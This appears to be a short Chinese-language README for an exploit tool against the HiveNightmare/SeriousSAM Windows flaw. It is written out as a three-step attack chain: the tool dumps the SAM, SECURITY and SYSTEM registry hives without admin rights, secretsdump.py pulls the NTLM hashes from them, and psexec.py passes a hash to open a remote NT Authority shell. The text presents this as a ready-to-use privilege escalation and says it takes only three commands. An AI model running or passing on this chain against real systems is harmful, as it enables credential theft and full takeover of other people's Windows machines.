一个针对 HiveNightmare/SeriousSAM 漏洞的利用工具,它允许你在没有管理员权限的情况下读取包含敏感数据的注册表配置单元。如果这听起来都不像权限提升,那我就不知道什么才算了。
使用 cargo build 构建漏洞利用程序并获取二进制文件后,将其部署到你的测试环境中,打开 CMD 并执行 .\oxide_hive [max shadow copies],卷影副本的默认值为 15。SAM、SECURITY 和 SYSTEM 配置单元应被转储到工作目录中。
从那时起,你可以使用这个脚本,配合命令 secretsdump.py -sam SAM.dump -security SECURITY.dump -system SYSTEM.dump local 来检索 NTLM 哈希。
然后,你可以使用另一个脚本,配合命令 psexec.py -hashes <account's hash> <user>@<machine's ip> cmd.exe 远程登录任何账户。恭喜你,你仅用 3 条命令就从非特权用户变成了 NT Authority。